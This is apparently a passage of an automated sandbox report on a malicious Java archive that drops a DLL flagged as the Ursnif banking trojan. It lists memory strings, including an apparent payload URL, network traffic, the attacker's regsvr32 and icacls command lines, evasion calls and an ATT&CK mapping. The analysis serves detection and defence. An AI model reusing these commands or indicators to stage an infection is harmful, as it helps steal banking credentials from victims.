        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
        Source: msapplication.xml5.7.drString found in binary or memory: http://www.twitter.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
        Source: msapplication.xml6.7.drString found in binary or memory: http://www.wikipedia.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
        Source: msapplication.xml7.7.drString found in binary or memory: http://www.youtube.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
        Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
        Source: notice[1].js0.8.drString found in binary or memory: https://api-js-log.trustarc.com/error
        Source: 0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=238559
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&b
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://consent-pref.trustarc.com/cookie_inneriframe.html
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://consent-pref.trustarc.com/defaultpreferencemanager/0D070042D9C67A68E1A4BF804E6E0E06.cache.ht
        Source: notice[1].js0.8.drString found in binary or memory: https://consent.trustarc.com/
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
        Source: notice[1].js0.8.drString found in binary or memory: https://consent.trustarc.com/log
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp, java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: https://docs.cyberservices.biz/presentation.dll
        Source: renderer[1].js.8.drString found in binary or memory: https://github.com/requirejs/requirejs/blob/master/LICENSE
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
        Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust
        Source: ~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.drString found in binary or memory: https://s.go-mpulse.net/boomerang/
        Source: ~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.drString found in binary or memory: https://s2.go-mpulse.net/boomerang/
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS
        Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSAString found in binary or memory: https://sectigo.com/CPS0
        Source: en[1].htm.8.drString found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30
        Source: en[1].htm.8.drString found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
        Source: ~DF9F66EA97E71930AD.TMP.7.drString found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
        Source: notice[1].js0.8.drString found in binary or memory: https://trustarc.mgr.consensu.org/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownHTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.3:49735 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

        E-Banking Fraud:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE
        Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D72485 NtQueryVirtualMemory,10_2_04D72485
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D7226410_2_04D72264
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D80CF310_2_04D80CF3
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D85C7310_2_04D85C73
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9246B10_2_04D9246B
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D91C3F10_2_04D91C3F
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9DD4C10_2_04D9DD4C
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9204B10_2_04D9204B
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9784A10_2_04D9784A
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9186B10_2_04D9186B
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D889D310_2_04D889D3
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9796010_2_04D97960
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D8713110_2_04D87131
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9139810_2_04D91398
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D7FB8010_2_04D7FB80
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9A35710_2_04D9A357
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\broker.dll 59767B2AC03EB8320A661F410D53A025C8975B12DE796E80B1C84306200F6A75
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04D85BF0 appears 56 times
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 04D882D2 appears 31 times
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
        Source: classification engineClassification label: mal80.troj.expl.winJAR@13/82@19/7
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dllJump to behavior
        Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: presentation.jarVirustotal: Detection: 19%
        Source: presentation.jarReversingLabs: Detection: 41%
        Source: java.exeString found in binary or memory: z0.in-addr.arpa
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
        Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar' Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dllJump to behavior
        Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
        Source: Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 0000000A.00000002.477390271.0000000004DA4000.00000002.00020000.sdmp, broker.dll.2.dr
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D71F31 LoadLibraryA,GetProcAddress,10_2_04D71F31
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_1529C2E7 pushad ; retf 2_3_1529C2FD
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_3_1529CAF0 push 181529C9h; retf 2_3_1529CB11
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D72253 push ecx; ret 10_2_04D72263
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D72200 push ecx; ret 10_2_04D72209
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D85C35 push ecx; ret 10_2_04D85C48
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D8439D push ecx; ret 10_2_04D843B0

        Persistence and Installation Behavior:

        barindex
        Exploit detected, runtime environment dropped PE fileShow sources
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: broker.dll.2.drJump to dropped file
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile created: C:\Users\user\AppData\Local\broker.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\broker.dllJump to dropped file
        Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-15915
        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564Thread sleep count: 178 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332Thread sleep count: 31 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332Thread sleep count: 31 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332Thread sleep count: 38 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332Thread sleep count: 179 > 30Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: java.exe, 00000002.00000002.241177068.0000000002A80000.00000004.00000001.sdmpBinary or memory string: ,java/lang/VirtualMachineError
        Source: java.exe, 00000002.00000002.241177068.0000000002A80000.00000004.00000001.sdmpBinary or memory string: |[Ljava/lang/VirtualMachineError;
        Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_10-15917
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D839FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_04D839FC
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D71F31 LoadLibraryA,GetProcAddress,10_2_04D71F31
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04DE2668 mov eax, dword ptr fs:[00000030h]10_2_04DE2668
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04DE259E mov eax, dword ptr fs:[00000030h]10_2_04DE259E
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04DE21A5 push dword ptr fs:[00000030h]10_2_04DE21A5
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D8CC83 __decode_pointer,SetUnhandledExceptionFilter,10_2_04D8CC83
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D8CC61 SetUnhandledExceptionFilter,__encode_pointer,10_2_04D8CC61
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D85618 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_04D85618
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D839FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_04D839FC
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D85973 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_04D85973
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeMemory protected: page read and write | page guardJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar' Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/Jump to behavior
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dllJump to behavior
        Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04DA0ADD cpuid 10_2_04DA0ADD
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,10_2_04D71566
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_04D8CCD5
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,10_2_04D8FC43
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_04D8FC07
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,10_2_04D8F6FD
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,10_2_04D966E4
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,10_2_04D8F7DF
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,10_2_04DA0881
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,10_2_04DA08BC
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,10_2_04D8D879
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,10_2_04D8F875
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_04DA09F9
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_04D8FAB7
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,10_2_04D9DA64
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_04D8FBA2
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesA,10_2_04D8FB78
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,10_2_04D8D364
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D717A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,10_2_04D717A7
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D9CD0B __lock,__invoke_watson,__invoke_watson,__invoke_watson,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,10_2_04D9CD0B
        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04D7146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,10_2_04D7146C
        Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Yara detected UrsnifShow sources
        Source: Yara matchFile source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsCommand and Scripting Interpreter2Services File Permissions Weakness1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsNative API2DLL Side-Loading1Services File Permissions Weakness1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery121Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsExploitation for Client Execution2Logon Script (Windows)DLL Side-Loading1Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
